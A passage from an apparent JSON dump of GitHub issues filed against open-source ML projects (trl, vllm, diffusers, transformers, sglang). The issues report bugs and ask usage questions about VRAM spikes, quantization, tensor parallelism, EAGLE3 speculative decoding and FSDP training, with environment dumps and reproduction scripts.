usage spikes during the evaluation loop, consuming way more vRAM than during the training.\n\nThe size of this vRAM spike seem to scale with the length of the input sequence: for cases with `max_length=40000`, we end up with spikes of ~50GB vRAM, far exceeding the amount used during the training.\n\nHere's a MLFlow GPU vRAM extract showcasing this on an A100 for this 40k token scenario with Qwen3-0.6B:\n\n\"Image\"\n\nAnd same goes for Qwen3-4B, 40k token:\n\n\"Image\"\n\n### Minimal reproduction script\n\nBelow is the [default SFT example from the documentation](https://github.com/huggingface/trl/blob/main/trl/scripts/sft.py), slightly altered to artificially create long input sequences (>=20k tokens) in both the training and evaluation dataset splits.\n\nBy running `watch -n 1 nvidia-smi` while the training is running, you can see that the vRAM usage is way higher during the evaluation phase than during the training. If your GPU has enough vRAM, you can increase the `max_length` parameter and this will become even more visible. _For some reason, I can't get `trackio` to properly report vRAM usage, hence the use of `nvidia-smi`.\n\nYou can launch the script with the following command:\n\n```bash\npython sft_example.py \\\n--model_name_or_path Qwen/Qwen3-0.6B \\\n--dataset_name trl-lib/Capybara \\\n--learning_rate 2.0e-4 \\\n--max-steps 10 \\\n--per_device_train_batch_size 1 \\\n--per_device_eval_batch_size 1 \\\n--eval_accumulation_steps 1 \\\n--gradient_accumulation_steps 1 \\\n--gradient_checkpointing \\\n--eos_token '<|im_end|>' \\\n--eval_strategy steps \\\n--eval_steps 10 \\\n--use_peft \\\n--lora_r 8 \\\n--lora_alpha 16 \\\n--use_liger \\\n--max_length 10000\n```\n\n```python\n# Copyright 2020-2025 The HuggingFace Team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# /// script\n# dependencies = [\n# \"trl\",\n# \"peft\",\n# \"trackio\",\n# \"kernels\"\n# ]\n# ///\n\nimport argparse\nimport os\n\nfrom accelerate import logging\nfrom datasets import load_dataset\nfrom transformers import AutoConfig, AutoModelForCausalLM\nfrom transformers.models.auto.modeling_auto import (\n MODEL_FOR_IMAGE_TEXT_TO_TEXT_MAPPING_NAMES,\n)\nfrom trl import (\n DatasetMixtureConfig,\n ModelConfig,\n ScriptArguments,\n SFTConfig,\n SFTTrainer,\n TrlParser,\n get_dataset,\n get_kbit_device_map,\n get_peft_config,\n get_quantization_config,\n)\n\nlogger = logging.get_logger(__name__)\n\n# Enable logging in a Hugging Face Space\nos.environ.setdefault(\"TRACKIO_SPACE_ID\", \"trl-trackio\")\n\n\ndef main(script_args, training_args, model_args, dataset_args):\n ################\n # Model init kwargs\n ################\n model_kwargs = dict(\n revision=model_args.model_revision,\n trust_remote_code=model_args.trust_remote_code,\n attn_implementation=model_args.attn_implementation,\n dtype=model_args.dtype,\n )\n quantization_config = get_quantization_config(model_args)\n if quantization_config is not None:\n # Passing None would not be treated the same as omitting the argument, so we include it only when valid.\n model_kwargs[\"device_map\"] = get_kbit_device_map()\n model_kwargs[\"quantization_config\"] = quantization_config\n\n # Create model\n config = AutoConfig.from_pretrained(model_args.model_name_or_path)\n valid_image_text_architectures = MODEL_FOR_IMAGE_TEXT_TO_TEXT_MAPPING_NAMES.values()\n\n if config.architectures and any(\n arch in valid_image_text_architectures for arch in config.architectures\n ):\n from transformers import AutoModelForImageTextToText\n\n model = AutoModelForImageTextToText.from_pretrained(\n model_args.model_name_or_path, **model_kwargs\n )\n else:\n model = AutoModelForCausalLM.from_pretrained(\n model_args.model_name_or_path, **model_kwargs\n )\n\n # Load the dataset\n if dataset_args.datasets and script_args.dataset_name:\n logger.warning(\n \"Both `datasets` and `dataset_name` are provided. The `datasets` argument will be used to load the \"\n \"dataset and `dataset_name` will be ignored.\"\n )\n ", "url": "https://github.com/huggingface/trl/issues/4679", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb SFT", "\u26a1 PEFT" ], "created_at": "2025-12-11T10:01:49Z", "updated_at": "2026-01-02T09:23:17Z", "comments": 3, "user": "Khreas" }, { "repo": "vllm-project/vllm", "number": 30477, "title": "[Usage]: How to disable thinking for Qwen-8B", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.5.1+cu121\nIs debug build : False\nCUDA used to build PyTorch : 12.1\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Nov 19 2025, 22:46:53) [Clang 21.1.4 ] (64-bit runtime)\nPython platform : Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.1.105\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA GeForce RTX 4090 Laptop GPU\nNvidia driver version : 546.26\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 39 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: GenuineIntel\nModel name: Intel(R) Core(TM) i9-14900HX\nCPU family: 6\nModel: 183\nThread(s) per core: 2\nCore(s) per socket: 16\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4838.39\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology tsc_reliable nonstop_tsc cpuid pni pclmulqdq vmx ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves avx_vnni umip waitpkg gfni vaes vpclmulqdq rdpid movdiri movdir64b fsrm md_clear serialize flush_l1d arch_capabilities\nVirtualization: VT-x\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 768 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 32 MiB (16 instances)\nL3 cache: 36 MiB (1 instance)\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Mitigation; Clear Register File\nVulnerability Retbleed: Mitigation; Enhanced IBRS\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.1.3.1\n[pip3] nvidia-cuda-cupti-cu12==12.1.105\n[pip3] nvidia-cuda-nvrtc-cu12==12.1.105\n[pip3] nvidia-cuda-runtime-cu12==12.1.105\n[pip3] nvidia-cudnn-cu12==9.1.0.70\n[pip3] nvidia-cufft-cu12==11.0.2.54\n[pip3] nvidia-curand-cu12==10.3.2.106\n[pip3] nvidia-cusolver-cu12==11.4.5.107\n[pip3] nvidia-cusparse-cu12==12.1.0.106\n[pip3] nvidia-nccl-cu12==2.21.5\n[pip3] nvidia-nvjitlink-cu12==12.9.86\n[pip3] nvidia-nvtx-cu12==12.1.105\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.5.1+cu121\n[pip3] torchaudio==2.5.1+cu121\n[pip3] torchvision==0.20.1+cu121\n[pip3] transformers==4.57.3\n[pip3] triton==3.1.0\n[conda] Could not collect\n\n", "url": "https://github.com/vllm-project/vllm/issues/30477", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-11T09:28:40Z", "updated_at": "2025-12-22T06:10:43Z", "comments": 3, "user": "fancyerii" }, { "repo": "huggingface/diffusers", "number": 12823, "title": "How to use quantizer after pipeline loaded?", "body": "How to use quantizer after pipeline loaded? \n\n- Currently\n\n```python\n# Quantization occurs at load time.\npipe = QwenImagePipeline.from_pretrained(\n (\n args.model_path\n if args.model_path is not None\n else os.environ.get(\n \"QWEN_IMAGE_DIR\",\n \"Qwen/Qwen-Image\",\n )\n ),\n scheduler=scheduler,\n torch_dtype=torch.bfloat16,\n quantization_config=quantization_config,\n)\n```\n\n- What i want \n\n```python\n# Load on CPU -> Load and fuse lora -> quantize -> to GPU\n```", "url": "https://github.com/huggingface/diffusers/issues/12823", "state": "open", "labels": [], "created_at": "2025-12-11T06:32:38Z", "updated_at": "2025-12-11T14:18:28Z", "user": "DefTruth" }, { "repo": "huggingface/transformers", "number": 42794, "title": "`decoder_start_token_id` or `bos_token_id` has to be defined for encoder-decoder generation.", "body": "### System Info\n\nlatest transformers\n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nimport torch\nfrom transformers import pipeline\n\npipe = pipeline(\n \"document-question-answering\",\n model=\"naver-clova-ix/donut-base-finetuned-docvqa\",\n dtype=torch.float16,\n)\n\nimage = \"https://huggingface.co/spaces/impira/docquery/resolve/2359223c1837a7587402bda0f2643382a6eefeab/invoice.png\"\nquestion = \"What is the invoice number?\"\n\nresult = pipe(image=image, question=question)\nprint(result)\n```\n\nerror:\n```\nTraceback (most recent call last):\n File \"/home/jiqingfe/transformers/test_dqa.py\", line 13, in \n result = pipe(image=image, question=question)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/document_question_answering.py\", line 310, in __call__\n return super().__call__(inputs, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/base.py\", line 1278, in __call__\n return next(\n ^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/pt_utils.py\", line 126, in __next__\n item = next(self.iterator)\n ^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/pt_utils.py\", line 271, in __next__\n processed = self.infer(next(self.iterator), **self.params)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/base.py\", line 1185, in forward\n model_outputs = self._forward(model_inputs, **forward_params)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/document_question_answering.py\", line 468, in _forward\n model_outputs = self.model.generate(**model_inputs, **generate_kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/sgl-workspace/miniforge3/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 120, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/generation/utils.py\", line 2551, in generate\n self._prepare_special_tokens(generation_config, kwargs_has_attention_mask, device=device)\n File \"/home/jiqingfe/transformers/src/transformers/generation/utils.py\", line 2145, in _prepare_special_tokens\n raise ValueError(\nValueError: `decoder_start_token_id` or `bos_token_id` has to be defined for encoder-decoder generation.\n```\n\n### Expected behavior\n\nCannot locate which PR caused this regression because too many errors recently. The transformers 4.57.3 works well on the script.", "url": "https://github.com/huggingface/transformers/issues/42794", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-11T06:22:58Z", "updated_at": "2025-12-18T18:33:40Z", "comments": 1, "user": "jiqing-feng" }, { "repo": "vllm-project/vllm", "number": 30464, "title": "[Usage]: How can I use the local pre-compiled wheel of vllm", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nEvery time I use `VLLM_USE_PRECOMPILED=1 uv pip install --editable .` to build vllm, it always takes much time to download the pre-compiled wheel. Would it be possible to build it by using a locally downloaded wheel file instead?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30464", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-11T06:22:43Z", "updated_at": "2025-12-12T01:02:22Z", "comments": 1, "user": "gcanlin" }, { "repo": "huggingface/transformers", "number": 42791, "title": "Add support for GPT_OSS with tp_plan or enable native tensor parallelism", "body": "### Model description\n\n #[https://huggingface.co/docs/transformers/main/perf_infer_gpu_multi?tp_plan=auto+plan](url)\n\n> https://github.com/huggingface/transformers/issues/41819\n\nThere are a list of supported models here, but GPT-OSS is not one of them. Please add support for GPT_OSS too to enable `tp_plan`. Please help me understand when model is prepared for TP in accelerate initiation, is there some native support needed in model for enabling TP.\n\nI have tried this example TP script [https://github.com/huggingface/accelerate/blob/main/examples/torch_native_parallelism/nd_parallel.py](url) with pure TP, on GPT-OSS-20B model and getting same error as mentioned in this already open issue:\n[]([https://github.com/huggingface/transformers/issues/41819](url).)\n\nAfter handling `DTensor` sinks as mentioned as a fix in above issue, still I find many such `DTensors` at multiple other places which is causing below error, due to incompatibility between ` DTensor ` and `torch.Tensor`. \n\n`raise RuntimeError(\n[rank0]: RuntimeError: aten.bmm.default: got mixed torch.Tensor and DTensor, need to convert all torch.Tensor to DTensor before calling distributed operators!`\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/42791", "state": "open", "labels": [ "New model" ], "created_at": "2025-12-11T04:31:19Z", "updated_at": "2025-12-19T08:38:31Z", "comments": 1, "user": "quic-akuruvil" }, { "repo": "sgl-project/sglang", "number": 14868, "title": "How to train vicuna EAGLE3 model?", "body": "I have carefully reviewed the official tutorials and source code, but I was unable to find the relevant config and template files specific to Vicuna.\n\nCould you please provide an example, specifically regarding the template structure?", "url": "https://github.com/sgl-project/sglang/issues/14868", "state": "open", "labels": [], "created_at": "2025-12-11T03:59:39Z", "updated_at": "2025-12-11T03:59:39Z", "comments": 0, "user": "Sylvan820" }, { "repo": "vllm-project/vllm", "number": 30447, "title": "[Usage]: how to load kv cache data into local file", "body": "### Your current environment\n\npthon3.10+vllm0.10.0\n\n### How would you like to use vllm\n\nI want to get int8 kv cache data from [qwen-int8](https://www.modelscope.cn/models/Qwen/Qwen-7B-Chat-Int8). I don't know how if vllm can do that? Thank you.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30447", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-11T01:43:58Z", "updated_at": "2025-12-12T15:11:50Z", "comments": 1, "user": "chx725" }, { "repo": "vllm-project/vllm", "number": 30441, "title": "[Usage]: vllm serve setup issues on B300", "body": "### Your current environment\n\nThe output of `python collect_env.py`\n```text\n\n\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Amazon Linux 2023.9.20251208 (x86_64)\nGCC version : (GCC) 11.5.0 20240719 (Red Hat 11.5.0-5)\nClang version : Could not collect\nCMake version : version 3.22.2\nLibc version : glibc-2.34\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu130\nIs debug build : False\nCUDA used to build PyTorch : 13.0\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.11.14 (main, Nov 12 2025, 00:00:00) [GCC 11.5.0 20240719 (Red Hat 11.5.0-5)] (64-bit runtime)\nPython platform : Linux-6.1.158-180.294.amzn2023.x86_64-x86_64-with-glibc2.34\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 13.0.88\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B300 SXM6 AC\nGPU 1: NVIDIA B300 SXM6 AC\nGPU 2: NVIDIA B300 SXM6 AC\nGPU 3: NVIDIA B300 SXM6 AC\nGPU 4: NVIDIA B300 SXM6 AC\nGPU 5: NVIDIA B300 SXM6 AC\nGPU 6: NVIDIA B300 SXM6 AC\nGPU 7: NVIDIA B300 SXM6 AC\n\nNvidia driver version : 580.105.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8559C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nBogoMIPS: 4800.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq monitor ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx_vnni avx512_bf16 wbnoinvd ida arat avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid cldemote movdiri movdir64b md_clear serialize amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; PBRSB-eIBRS SW sequence; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsa: Not affected\nVulnerability Tsx async abort: Not affected\nVulnerability Vms", "url": "https://github.com/vllm-project/vllm/issues/30441", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-10T23:50:27Z", "updated_at": "2025-12-13T02:01:04Z", "comments": 1, "user": "navmarri14" }, { "repo": "sgl-project/sglang", "number": 14824, "title": "Throughput degradation on Qwen3-30B-A3B with EAGLE3", "body": "I observed a throughput degradation when trying to use EAGLE3 to speed up Qwen3-30B-A3B (on 2x H100).\n\nI suspect the overhead might be overshadowing the gains. It would be great if we could have some profiling analysis to pinpoint exactly where the cost is coming from.\n\nAlso, tuning parameters for MoE models feels much more difficult than for dense models. Do you think it would be possible to provide a guidance or a micro-benchmarking script? This would really help users quickly identify the optimal parameters for their specific hardware.\n\n(For reference, the related issue is [this](https://github.com/sgl-project/SpecForge/issues/339).)\n\nTwo quick questions:\n\nI\u2019m still wondering: why does EAGLE3 seem less effective on Qwen3 compared to other models?\n\nAre there any specific tricks for training a high-quality EAGLE3 draft model for this architecture?\n\nThanks! \ud83e\udd79\ud83e\udd79\n", "url": "https://github.com/sgl-project/sglang/issues/14824", "state": "open", "labels": [], "created_at": "2025-12-10T14:22:05Z", "updated_at": "2025-12-19T21:36:54Z", "comments": 1, "user": "Zzsf11" }, { "repo": "vllm-project/vllm", "number": 30392, "title": "[Bug]: Docker image v0.12.0 Fail to serve via Docker image", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.6.87.2-microsoft-standard-WSL2-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA RTX A4000\nGPU 1: NVIDIA RTX A4000\n\nNvidia driver version : 581.15\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 8\nOn-line CPU(s) list: 0-7\nVendor ID: AuthenticAMD\nModel name: AMD Ryzen 7 3800X 8-Core Processor\nCPU family: 23\nModel: 113\nThread(s) per core: 2\nCore(s) per socket: 4\nSocket(s): 1\nStepping: 0\nBogoMIPS: 7800.02\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy svm cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core ssbd ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 clzero xsaveerptr arat npt nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold v_vmsave_vmload umip rdpid\nVirtualization: AMD-V\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 128 KiB (4 instances)\nL1i cache: 128 KiB (4 instances)\nL2 cache: 2 MiB (4 instances)\nL3 cache: 16 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-7\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; untrained return thunk; SMT enabled with STIBP protection\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; IBPB conditional; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n[pip3] numpy==2.2.0\n[pip3] nvidia-cublas-cu12==12.9.1.4\n[pip3] nvidia-cuda-cupti-cu12==12.9.79\n[pip3] nvidia-cuda-nvrtc-cu12==12.9.86\n[pip3] nvidia-cuda-runtime-cu12==12.9.79\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.4.1.4\n[pip3] nvidia-cufile-cu12==1.14.1.1\n[pip3] nvidia-curand-cu12==10.3.10.19\n[pip3] nvidia-cusolver-cu12==11.7.5.82\n[pip3] nvidia-cusparse-cu12==12.5.10.65\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.3.1\n[pip3] ", "url": "https://github.com/vllm-project/vllm/issues/30392", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-10T13:43:59Z", "updated_at": "2026-01-04T14:24:56Z", "comments": 7, "user": "kuopching" }, { "repo": "huggingface/transformers", "number": 42771, "title": "FSDP of Trainer does not work well with Accelerate", "body": "### System Info\n\n- `transformers` version: 4.57.3\n- Platform: Linux-6.6.97+-x86_64-with-glibc2.35\n- Python version: 3.11.11\n- Huggingface_hub version: 0.36.0\n- Safetensors version: 0.7.0\n- Accelerate version: 1.12.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.9.1+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA H100 80GB HBM3\n\n### Who can help?\n\n@3outeille @ArthurZucker @SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\n\"\"\"\nSimple example of training BERT with Transformers Trainer and FSDP\nUses random data for quick demonstration\n\"\"\"\n\nimport torch\nfrom transformers import (\n BertForSequenceClassification,\n BertTokenizer,\n Trainer,\n TrainingArguments,\n)\nfrom torch.utils.data import Dataset\n\n\n# Create a simple dataset with random data\nclass RandomDataset(Dataset):\n def __init__(self, tokenizer, num_samples=1000, max_length=128):\n self.tokenizer = tokenizer\n self.num_samples = num_samples\n self.max_length = max_length\n \n def __len__(self):\n return self.num_samples\n \n def __getitem__(self, idx):\n # Generate random token IDs\n input_ids = torch.randint(\n 0, self.tokenizer.vocab_size, (self.max_length,)\n )\n attention_mask = torch.ones(self.max_length)\n labels = torch.randint(0, 2, (1,)).item() # Binary classification\n \n return {\n \"input_ids\": input_ids,\n \"attention_mask\": attention_mask,\n \"labels\": labels,\n }\n\n\ndef main():\n # Initialize tokenizer and model\n model_name = \"bert-base-uncased\"\n tokenizer = BertTokenizer.from_pretrained(model_name)\n model = BertForSequenceClassification.from_pretrained(\n model_name, num_labels=2\n )\n \n # Create random datasets\n train_dataset = RandomDataset(tokenizer, num_samples=1000)\n eval_dataset = RandomDataset(tokenizer, num_samples=200)\n \n # Configure FSDP training arguments\n training_args = TrainingArguments(\n output_dir=\"./bert_fsdp_output\",\n num_train_epochs=3,\n per_device_train_batch_size=8,\n per_device_eval_batch_size=8,\n logging_steps=50,\n eval_strategy=\"steps\",\n eval_steps=100,\n save_steps=200,\n save_total_limit=2,\n \n # FSDP Configuration\n fsdp=\"full_shard auto_wrap\", # Enable FSDP with full sharding\n fsdp_config={\n \"fsdp_transformer_layer_cls_to_wrap\": [\"BertLayer\"], # Wrap BERT layers\n \"fsdp_backward_prefetch\": \"backward_pre\",\n \"fsdp_forward_prefetch\": False,\n \"fsdp_use_orig_params\": True,\n },\n \n # Additional settings\n learning_rate=5e-5,\n warmup_steps=100,\n weight_decay=0.01,\n logging_dir=\"./logs\",\n report_to=\"none\", # Disable wandb/tensorboard for simplicity\n )\n \n # Initialize Trainer\n trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n )\n \n # Train the model\n print(\"Starting training with FSDP...\")\n trainer.train()\n \n # Save the final model\n trainer.save_model(\"./bert_fsdp_final\")\n print(\"Training completed!\")\n\n\nif __name__ == \"__main__\":\n # Note: Run this script with torchrun for multi-GPU training\n # Example: torchrun --nproc_per_node=2 train_bert_fsdp.py\n main()\n```\n\ntorchrun --nproc_per_node=2 train_bert_fsdp.py\n\n### Expected behavior\n\nIt will fail silently. The trace stack, \n```bash\nW1210 12:49:05.011000 104846 site-packages/torch/distributed/run.py:803] \nW1210 12:49:05.011000 104846 